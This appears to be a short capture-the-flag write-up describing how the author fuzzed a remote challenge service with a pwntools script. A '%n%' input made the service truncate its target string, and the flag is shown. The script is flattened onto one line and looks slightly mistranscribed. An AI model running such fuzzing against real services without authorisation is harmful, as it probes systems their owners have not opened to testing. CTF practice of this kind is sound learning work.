This one was weird. Just connect to a remote and find a vulnerability.
I ended up using something that looked like this:
from pwn import * import itertools for pair in itertools.product(string.printable, string.printable): p = remote("ggcs-bx01.allyourbases.co", 9171) p.sendline(pair + pair) resp = pair + pair + ": " + p.recvall().decode("ascii") if "Invalid service request" not in resp: print(resp)
As it turns out,
% triggers some kind of format string?
About an hour of fuzzing later, I found I could prepend values and use
%n% to replace characters from the target
string. For example, the following interaction happened:
Right now I would be number 1337 That's leet and all but won't you make me number 1? > 111111111111111111 %n% Object validated, contents is 'Right now I would be n'
Perhaps we're intended to make it say
Right now I would be number 1?
Right now I would be number 1337 That's leet and all but won't you make me number 1? > 1111111111111111111111111 %n% Object validated, contents is 'Right now I would be number 1' Flag: tRUNkated-EveRYTHinG-6761
It works, I'm not gonna question it.